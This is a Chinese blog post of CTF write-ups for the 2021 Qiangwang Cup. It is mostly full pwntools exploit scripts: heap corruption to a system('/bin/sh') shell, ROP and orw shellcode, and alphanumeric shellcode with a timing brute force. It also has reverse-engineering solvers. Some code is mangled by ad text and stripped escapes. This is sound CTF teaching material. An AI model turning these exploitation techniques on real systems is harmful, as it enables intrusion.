阿里面试加分项之我参加过CTF(芜湖起飞)

最新推荐文章于 2024-05-10 00:16:05 发布
最新推荐文章于 2024-05-10 00:16:05 发布
阅读量459 收藏 1
点赞数 1
分类专栏: 你永远不了CTF的魅力! 文章标签: 网络安全 渗透测试 pwn Web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MachineGunJoe/article/details/117957465
版权

目录

前言: 

PWN部分

baby_diary

[强网先锋]orw

[强网先锋]no_output

babypwn

[强网先锋]shellcode 

RE部分

ezmath

LongTimeAgo

→【资料获取】←

前言: 

面试的时候,面试官竟然问我CTF真题,叫我解析给他看??!

我:那就不好意思了....

PWN部分

baby_diary

参考:https://bbs.pediy.com/thread-257901.htm 实现堆块复用,后面就是常规题目

EXP

# encoding:utf-8
from pwn import *
libc=ELF('./libc-2.31.so')

def add(size,data='a'):
    p.recvuntil('>> ')
    p.sendline('1')
    p.recvuntil('ize: ')
    p.sendline(str(size))
    p.recvuntil('content: ')
    p.sendline(str(data))
def show(id):
    p.recvuntil('>> ')
    p.sendline('2')
    p.recvuntil('dex: ')+QQ群:581499282一起聊天吹水
    p.sendline(str(id))
def delete(id):
    p.recvuntil('>> ')
    p.sendline('3')
    p.recvuntil('dex: ')
    p.sendline(str(id))

while True:
    try:
        p=remote('8.140.114.72',1399)
        # p=process('./pwn')

        for i in range(8):
        	add(0x1f)
        for i in range(7):
        	add(0x7f)
        add(26639)
        add(0x1f)
        add(0x720-1) 
        add(0x70-1) 
        add(0x7f) 
        delete(17)
        add(0x1010-1) 
        delete(20)
        add(0x1f,('x01'*5).ljust(8,'x00')+p64(0x201))
        for i in range(7):
        	delete(i)
        for i in range(7):
        	add(0x20)
        add(0x1f,'x60') 
        for i in range(7):
        	delete(i+8)
        delete(19)
        delete(21)
        add(0x1018) 
        for i in range(7):
        	add(0x80)
        add(0x80,p64(0)+'x60') 
        delete(22)
        add(0x147,'x00'*0x140+p64(0)) 
        delete(21)

        add(0x146,'x00'*0x138+'x01x01'.ljust(8,'x00')) 
        delete(23)
        add(0xa0-1) 

        show(21)
        p.recvuntil("content: ")
        leak_addr=u64(p.recv(6).ljust(8,'x00'))
        libcbase=leak_addr-0x1ebbe0
        system_addr=libcbase+libc.sym['system']
        free_addr=libcbase+libc.sym['__free_hook']
        delete(16)

        add(0x1f,p64(0)+p64(0x31))
        delete(22)
        delete(16)
        add(0x1f,'a'*0x10+p64(free_addr))
        add(0x1f,'/bin/shx00')
        add(0x1f,p64(system_addr))
        delete(22)

        p.interactive()
    except Exception as e:
        pass

 

[强网先锋]orw

from pwn import*
import pwn
content.log_level='debug'

def add(id,size,content):
	p.recvuntil('choice >>n')
	p.sendline('1')
	p.recvuntil('ndex:n')
	p.sendline(str(id))
	p.recvuntil('size:n')
	p.sendline(str(size))
	p.recvuntil('content:n')
	p.send(str(content))

def delete(id):
	p.recvuntil('choice >>n')
	p.sendline('4')
	p.recvuntil('ndex:n')
	p.sendline(str(id))

shellcode='''
mov r8, rdi
xor rsi,rsi
mov rdi ,r8
mov rax, 2
syscall
mov rdi, rax
mov rsi, r8
mov rdx, 0x30
mov rax, 0
syscall
mov rdi, 1
mov rsi,r8
mov rdx, 0x30
mov rax, 1
syscall
'''
payload=pwn.asm(shellcode)
add(0,8,'./flagx00'+'n')
add(-25,'a',payload+'n')


delete(0)
p.interactive()

[强网先锋]no_output

漏洞

2021第五届强网杯全国网络安全挑战赛线上赛 Write-Up

存在栈溢出:

思路

远程存在 real_flag.txt 读入后 unk_804C080 是 0x3

2021第五届强网杯全国网络安全挑战赛线上赛 Write-Up

在 read(0, buf, 0x30u); 输入 x00 覆盖 unk_804C080 为 0x00 ,实现向 src 输入,输入对应内容进入 if 内

2021第五届强网杯全国网络安全挑战赛线上赛 Write-Up

输入对应值后进入 if 内,配置了一个浮点数错误的 signal :在发生致命的算术运算错误时发出,不仅包括浮点运算错误,还包括溢出及除数为0等其它所有的算术的错误。由于 v1 固定是 1 ,所以这种制造错误的方法 pass 。不一定要是被 0 除以。的补码 INT_MIN/-1 除法陷阱也行:

-2147483648/-1

2021第五届强网杯全国网络安全挑战赛线上赛 Write-Up

产生错误之后跳转运行栈溢出函数

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']


# p = process("./test")
p = remote("39.105.138.97",1234)
libc = ELF("/lib/i386-linux-gnu/libc-2.27.so")
elf = ELF("./test")

# gdb.attach(p,"b *0x80494c0")
# gdb.attach(p,"b *0x080492E2")
# gdb.attach(p,"b *0x0804925B")
# raw_input()

p.send('x00'*2)+QQ群:581499282一起聊天吹水
sleep(0.1)
p.send('./flag'.rjust(0x20,'a'))
sleep(0.2)
p.sendline("hello_boy")
sleep(0.2)
p.sendline("-2147483648")
sleep(0.2)
p.sendline("-1")

bss = 0x0804c07c-2

payload = 'a'*0x48+'b'*0x4
# payload += p32(elf.plt['read'])+p32(0x08049581)+p32(0)+p32(0x0804C060+0x100)+p32(0x100)
payload += p32(elf.plt['open'])+p32(0x08049582)+p32(bss)+p32(0)
payload += p32(elf.plt['read'])+p32(0x08049581)+p32(4)+p32(0x0804C060+0x200)+p32(0x100)
payload += p32(elf.plt['read'])+p32(0x08049581)+p32(0)+p32(elf.got['read'])+p32(0x100)
payload += p32(elf.plt['read'])+p32(0x08049581)+p32(1)+p32(0x0804C060+0x200)+p32(0x100)
# payload += p32(0x0804944B)
p.sendline(payload)

# gdb.attach(p,"b *0x080492E2")
# raw_input()
# p.send("./flagx00")
p.send('x30xfe')
sleep(0.2)
flag = p.recv(timeout=1)
print flag
# if '{' not in flag:
#     p.close()
#     return 0
p.interactive()

babypwn

offbynull 造成堆块重叠,然后攻击 stdout 泄露 libc ,有沙盒限制系统调用

EXP

from pwn import*
# context.log_level='debbug'
elf=ELF('babypwn')
libc=ELF('./libc.so.6')
p=process('./babypwn',env={'LD_PRELOAD':'./libc.so.6'})
#p=process('./babypwn')
def add(size):
	p.recvuntil('>>> n')
	p.sendline('1')
	p.recvuntil('size:')
	p.sendline(str(size))

def edit(id,content):
	p.recvuntil('>>> n')
	p.sendline('3')
	p.recvuntil('index:')
	p.sendline(str(id))
	p.recvuntil('content:')
	p.send(str(content))
def delete(id):
	p.recvuntil('>>> n')
	p.sendline('2')
	p.recvuntil('index:')
	p.sendline(str(id))
def show(id):
	p.recvuntil('>>> n')
	p.sendline('4')
	p.recvuntil('index:')
	p.sendline(str(id))

add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0xf0)
add(0xf0)
add(0xf0)
add(0xf0)
add(0xf0)
add(0xf0)
add(0xf0)

for i in range(9,3,-3):
	delete(i)
for i in range(7):
	delete(10+i)

delete(1)
delete(0)

add(0x108)
edit(2,'b'*0xf0+p64(0)+p64(0x21))
edit(3,(p64(0)+p64(0x21))*7)
edit(0,'b'*0x108)
edit(0,'b'*0x100+p64(0x220))

delete(3)
delete(2)

add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)
add(0x100)

add(0x200)
add(0x100)
delete(6)
delete(5)
delete(3)
delete(0)

edit(8,'a'*0x108+p64(0x110)+'x18x80')
edit(9,p64(0)+'x60xe7')
add(0x100)
add(0x100)
add(0x100)
payload=p64(0xfbad1887)+p64(0)*3+'x00'
edit(5,payload)
p.recvuntil('x00'*8)
lead_addr=u64(p.recv(8))
libc_base=lead_addr-(0x7ffff7dcf8b0-0x00007ffff79e2000)
delete(4)
delete(1)
delete(0)

free_addr=libc_base+libc.sym['__free_hook']
edit(8,'a'*0x108+p64(0x110)+p64(free_addr))

add(0x100)
add(0x100)
add(0x100)

gadget=libc_base+0x520A5
open_addr=libc_base+libc.sym['open']
read_addr=libc_base+libc.sym['read']
write_addr=libc_base+libc.sym['write']
poprdi=libc_base+0x000000000002155f
poprsi=libc_base+0x0000000000023e6a
poprdx=libc_base+0x0000000000001b96
flag=free_addr+0xb0
add=free_addr

payload=p64(gadget)+p64(poprdi)+p64(flag)+p64(poprsi)+p64(0)+p64(open_addr)+p64(poprdi)+p64(3)+p64(poprsi)+p64(flag)+p64(poprdx)+p64(0x30)+p64(read_addr)
payload+=p64(poprdi)+p64(1)+p64(poprsi)+p64(flag)+p64(poprdx)+p64(0x30)+p64(write_addr)


edit(1,payload.ljust(0xa0,'x00')+p64(add)+p64(poprdi)+'./flag')

# gdb.attach(p)
# raw_input()
delete(1)+QQ群:581499282一起聊天吹水


p.interactive()

 

[强网先锋]shellcode 

写 shellcode 题目。分类为禁用 write 和 system ,限制 shellcode 为可见字符串类型。禁用 write 思路和蓝帽杯 slient 思路一样,读取 flag 到内存中然后比较,爆破得出 flag 。限制可见字符串类型,参考 mrctf2020_shellcode_revenge 将 shellcode 转换为可见字符串,alpha3 转换结果错误,改用 AE64 转换成功。

参考:https://n0va-scy.github.io/2020/06/21/shellcode%E7%9A%84%E8%89%BA%E6%9C%AF/实现读取 flag 到栈上,后面就用蓝帽杯思路比较字符

EXP

# encoding:utf-8
from pwn import *
from ae64 import AE64
# context.log_level = 'debug'
# context.terminal = ['tmux','sp','-h']

file = context.binary = './shellcode'
obj = AE64()

append_x86 = '''
push ebx
pop ebx
'''
shellcode_x86 = '''
/*fp = open("flag")*/
mov esp,0x40404140
push 0x67616c66
push esp
pop ebx
xor ecx,ecx
mov eax,5
int 0x80
mov ecx,eax

/* read(fp,buf,0x70) */
/*mov eax,3*/
/*push 0x70*/
/*push ebx*/
/*push 3*/
/*int 0x80*/
'''
shellcode_flag = '''
push 0x33
push 0x40404089
retfq
/*read(fp,buf,0x70)*/
mov rdi,rcx
mov rsi,rsp
mov rdx,0x70
xor rax,rax
syscall


'''
shellcode_x86 = asm(shellcode_x86,arch = 'i386',os = 'linux',bits='32')
shellcode_flag = asm(shellcode_flag,arch = 'amd64',os = 'linux')
shellcode = ''
append = '''
push rdx
pop rdx
'''
# 0x40404040 为32位shellcode地址
shellcode_mmap = '''
/*mmap(0x40404040,0x7e,7,34,0,0)*/
push 0x40404040 /*set rdi*/
pop rdi

push 0x7e /*set rsi*/
pop rsi

push 0x40 /*set rdx*/
pop rax
xor al,0x47
push rax
pop rdx

push 0x40 /*set r8*/
pop rax
xor al,0x40
push rax
pop r8

push rax /*set r9*/
pop r9

/*syscall*/
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x31],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x32],cl

push 0x22 /*set rcx*/
/*pop rcx*/
pop r10

push 0x40/*set rax*/
pop rax
xor al,0x49
syscall
'''
shellcode_read = '''
/*read(0,0x40404040,0x70)*/
push 0x40404040
pop rsi
push 0x40
pop rax
xor al,0x40
push rax
pop rdi
xor al,0x40
push 0x70
pop rdx
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl
push rdx
pop rax
xor al,0x70
syscall
'''

shellcode_retfq = '''
push rbx
pop rax

xor al,0x40

push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
retfq
'''

shellcode = ''
shellcode += shellcode_mmap
shellcode += append
shellcode += shellcode_read
shellcode += append

shellcode += shellcode_retfq
shellcode += append

sc = obj.encode(asm(shellcode),'rbx')
#p=process(file)

# gdb.attach(p,"b *0x40026D")
# gdb.attach(p,"b *0x7ffff7ff9102")
# raw_input()

# p.send(sc)
# pause()
# p.sendline(shellcode_x86 + 0x29*'x90' + shellcode_flag)
# print p.recv()
# p.interactive()


def pwn(p, index, ch):
        #gdb.attach(p,"b *0x40026D")
	#pause()
	p.send(sc)

	shellcode=''
	if index == 0:
		shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
	else:
		shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)
	p.sendline(shellcode_x86 + 0x29*'x90'+ shellcode_flag + asm(shellcode))
	#print p.recv()
	#p.interactive()
index = 0
a = []

while True:
    for ch in range(20, 127):
        p = remote('39.105.137.118','50050')
        # p=process(file)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            a.append(ch)
            print("".join([chr(i) for i in a]))
            break
    else:
        print("".join([chr(i) for i in a]))
        break
    index = index + 1

print("".join([chr(i) for i in a]))

RE部分

ezmath

import codecs
t=[0.00009794904266317233, 0.00010270456917442, 0.00009194256152777895,
     0.0001090322021913372, 0.0001112636336217534, 0.0001007442677411854,
     0.0001112636336217534, 0.0001047063607908828, 0.0001112818534005219,
     0.0001046861985862495, 0.0001112818534005219, 0.000108992856167966,
     0.0001112636336217534, 0.0001090234561758122, 0.0001113183108652088,
     0.0001006882924839248, 0.0001112590796092291, 0.0001089841164633298,
     0.00008468431512187874]
div = 2.718281828459045
def c(n):
    t_int = int(div // n)
    print(hex(t_int))
    if abs(t_int * n - div) < abs((t_int - 1) * n - div):
        t_int -=1
    t_hex = hex(t_int)[2:]
    t_chr = codecs.decode(t_hex,'hex')
    return t_chr[::-1].decode()

for i in t:
    print(c(i),end='n')

LongTimeAgo

def xt_dec(num, enc, k):
    value0 = enc[0]
    value1 = enc[1]
    data = 0x70C88617
    sum = 0xE6EF3D20
    for i in range(num):
        value1 -= (((value0 << 4) ^ (value0 >> 5)) + value0) ^ (sum + k[(sum >> 11) & 3])
        value1 &= 0xffffffff
        sum += data
        value0 -= (((value1 << 4) ^ (value1 >> 5)) + value1) ^ (sum + k[sum & 3])
        value0 &= 0xffffffff
    return (value0, value1)
def t_dec(enc, k):
    value0 = enc[0]
    value1 = enc[1]
    sum = 0xa6a53780
    data = 0x3D3529BC
    for i in range(32):
        value1 -= ((value0 << 4) + k[2]) ^ (value0 + sum) ^ ((value0 >> 5) + k[3])
        value1 &= 0xffffffff
        value0 -= ((value1 << 4) + k[0]) ^ (value1 + sum) ^ ((value1 >> 5) + k[1])
        value0 &= 0xffffffff
        sum -= data
    return (value0, value1)
encode = [0x1F306772, 0xB75B0C29, 0x4A7CDBE3, 0x2877BDDF, 0x1354C485, 0x357C3C3A, 0x738AF06C, 0x89B7F537]
for i in range(0, 4, 2):
    encode[i] ^= 0xfd
    encode[i + 1] ^= 0x1fd
for i in range(4, 8, 2):
    encode[i] ^= 0x3fd
    encode[i + 1] ^= 0x7fd
k = [0xfffd, 0x1fffd, 0x3fffd, 0x7fffd]
result = ''
for i in range(0, 4, 2):
    a = xt_dec(32, encode[i:], k)
    result += hex(a[0])[2:] + hex(a[1])[2:]
for i in range(4, 8, 2):
    a = t_dec(encode[i:], k)
    result += hex(a[0])[2:] + hex(a[1])[2:]
print("QWB{" + result.upper() + "}")

看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了

俺是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些CTF夺旗赛干货贡献给大家,回馈每一个读者,希望能帮到你们。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2021密码学/隐身术/PWN技术手册大全

→【资料获取】←

我是黑客
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
CTF常见密之日历密码解密工具
09-07
某次CTF比赛遇到了日历密码的题目,因为比赛时没有找到类似工具,感觉人工解密还是需要一定时间的,赛后写了一个小工具,可以快速解密日历密码。 运行 CalendarCryptoTool.jar 文件,输入密文、密钥,点击解密即可。...
【2021强网杯】Write-Up真题PWN和RE部分(强推)
kali_Ma的博客
06-16 1400
前言 不得不说强网的反作弊做的真心不错 re 不一样 真心可以 话不多说,请往下看: baby_diary 参考实现堆块复用,后面就是常规题目 EXP # encoding:utf-8 from pwn import * libc=ELF('./libc-2.31.so') def add(size,data='a'): p.recvuntil('>> ') p.sendline('1') p.recvuntil('ize: ') p.sendline(str(size)) p.
网络安全最新CTF文件上传下载系统靶场,2024年最新阿里大神最佳总结Flutter进阶学习笔记
最新发布
2301_82241775的博客
05-10 271
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
2021强网杯全国网络安全挑战赛Writeup
道阻且长,行则将至。
06-20 7598
文章目录前言强网先锋-赌徒PHP的魔术方法题目POP链构造强网先锋-寻宝Key1之代码审计Key2之脚本搜索 前言 上周末端午假期期间(6月12日9:00至6月13日21:00)参与了为期 36h 的第五届强网杯网络安全竞赛,不得不说题目比去年难多了,两天下来腰酸背痛脑壳疼……比赛的数据大致如下: 幸运的是最终在实力傍队友的情况下,又一年获得竞赛前 10% 有效排名的 “强网先锋” 称号,在此记录下比赛的 Writeup。 强网先锋-赌徒 1、下发赛题,访地址如下: 2、结合题目源码提醒,利用 dir
强网杯部分pwn题writeup
Sakura给爷pwn全场
10-01 547
强网杯部分pwn题writeup: https://www.anquanke.com/post/id/215274#h3-2
2021强网杯 pwn babypwn
yongbaoii的博客
07-15 598
libc是2.27的。 保护全开。 还开了沙箱。 经典增删改查。 add 最多17个chunk,chunk的大小最大0x200.地址跟发小都放在了bss上面。 delete 清理的很干净。 edit edit也看着没啥,里面有个函数,进去看看。 会把所有的’\x11’变成’\x00’,但是题就出在它没有边界,仅仅是到’\x00’就停而已。那么我们就可以有越界,来造成off by null。 show 输出都点不大正常。首先发现它是前后四个字节分开的。 然后看一下那个输出函数。 密的,好家伙。 先.
CTF Crypto BubbleBabble气泡密.py
09-19
CTF Crypto BubbleBabble 气泡密解密脚本 python3
CTF-Writeups:我之前参加过的CTF挑战集文章集
04-10
这是针对我成功完成的各种CTF挑战的文章的资料库。 并非所提供的所有解决方案都是挑战创建者的意图,但我将确保在必要时提及此题,因为它对求解器和创建者都有帮助。 我希望这可以帮助你! 到目前为止,我最喜欢...
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
CTFs:我参加的所有CTF的论文
03-29
此仓库包含我参加CTF的文章。 展示链接 :网络安全初学者的好课程 :更多工具 :包含所有CTF及其资源的时间表。 我的工具箱 wirehark:用于嗅探数据包和网络相关的活动。 ghidra:软件逆向工程工具。 主要用于...
强网杯2021 pwn writeup by syclover
qq_51868336的博客
06-15 870
no_output 首先是利用strcpy把fd给覆盖为0 然后read hello_boy 通过检测 接着触发算数运算错误 就能进入栈溢出函数 最后就是直接用32位ret2dlresolve的模板了 from pwn import * arch = 32 challenge = "./test" local = int(sys.argv[1]) context(log_level = "debug",os = "linux") if local: r = process(chal
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1261
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相再相…直到变成一个byte的数字, 然后到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
强网杯2021 pwn 赛题解析——baby_diary
CoLin的pwn小屋
07-25 484
强网杯2021 pwn 赛题回顾
Timer(阿里CTF)
weixin_30367543的博客
04-07 262
下载文件之后发现是.apk类型文件,于是百度搜索了一下推荐再电脑上安装安卓模拟器,都尝试了一下逍遥安卓是真的不好用,小白觉得还是BlueStacks好用一些,下载之后去安装打开就看到了, 什么都没有发现,只看到时间再慢慢的减小,猜测可能是跑时间的然后出现flag jeb反编译,点击mainactivity查看smali代码: 直接看主要的代码吧,如下: 接下...
2020强网杯wp-pwn-babymessage
weixin_45209963的博客
08-27 685
题目质量还不错…就是快二十道pwn实在是吓人… 一开始看到堆还没有free以为是horse of orange就溜了 回头一看40多解… 再仔细一看只是栈溢出…傻了 考点也是常规考点,栈迁移 换取足够的写入长度 然后onegadget完事 老样子一个菜单 leave name 可以往bss段的一个地方写4字节 leave message 之前有一个写入长度判断 当然正常情况写入长度只可以是0x10 重点在leave message里面 有一个栈溢出可以覆盖到saved ebp 于是我们可以先在nam
简单的逆向-LoopAndLoop(阿里CTF)
qq_41071646的博客
11-08 1402
突然发现 这个比赛 有些题还是比较简单的  简单的数据验证   下载链接: https://pan.baidu.com/s/1uvsl_xusNMMnnrjOzuoffg 密码: me4j   这道题的页面是  输入数字 会出现  Not Right!   输入字母 会出现Not a Valid Integer number  emmm 然后 拖入andoridstdio  发现了 ...
BugkuCTF-Reverse题Timer(阿里CTF)
am_03的博客
08-27 670
知识点 JEB相当于Windows平台上的IDA smali代码:双击Bytecode,出现smali代码;相较于C之汇编,那么smali之于Java onCreate: 一个activity启动回调的第一个函数就是onCreate,这个函数主要做这个activity启动的一些需要的初始操作的工作。 onCreate之后调用了还有onRestart()和onStart()等。 解题流程 下载apk包 apk安装之后出现一个读秒的,20万秒,大于3600,所以大于一个小时,所以太慢了,不等了。 jeb反编译
面试经验!!CTF战队冲冲冲,,网络安全!!
c582037的博客
09-27 186
网络安全。。CTF战队面试!!!虽然没过,但是获得了好多好多知识!!!!
给我列一些详细的参加CTF比赛需要学习的知识
05-30
好的,以下是一些常见的参加CTF比赛需要学习的知识: 1. 网络安全:掌握网络协议、网络扫描、漏洞扫描、漏洞利用等。 2. Web安全:掌握常见Web漏洞,如SQL注入、XSS、CSRF等,以及相关的攻击和防御技巧。 3. 二...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是黑客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值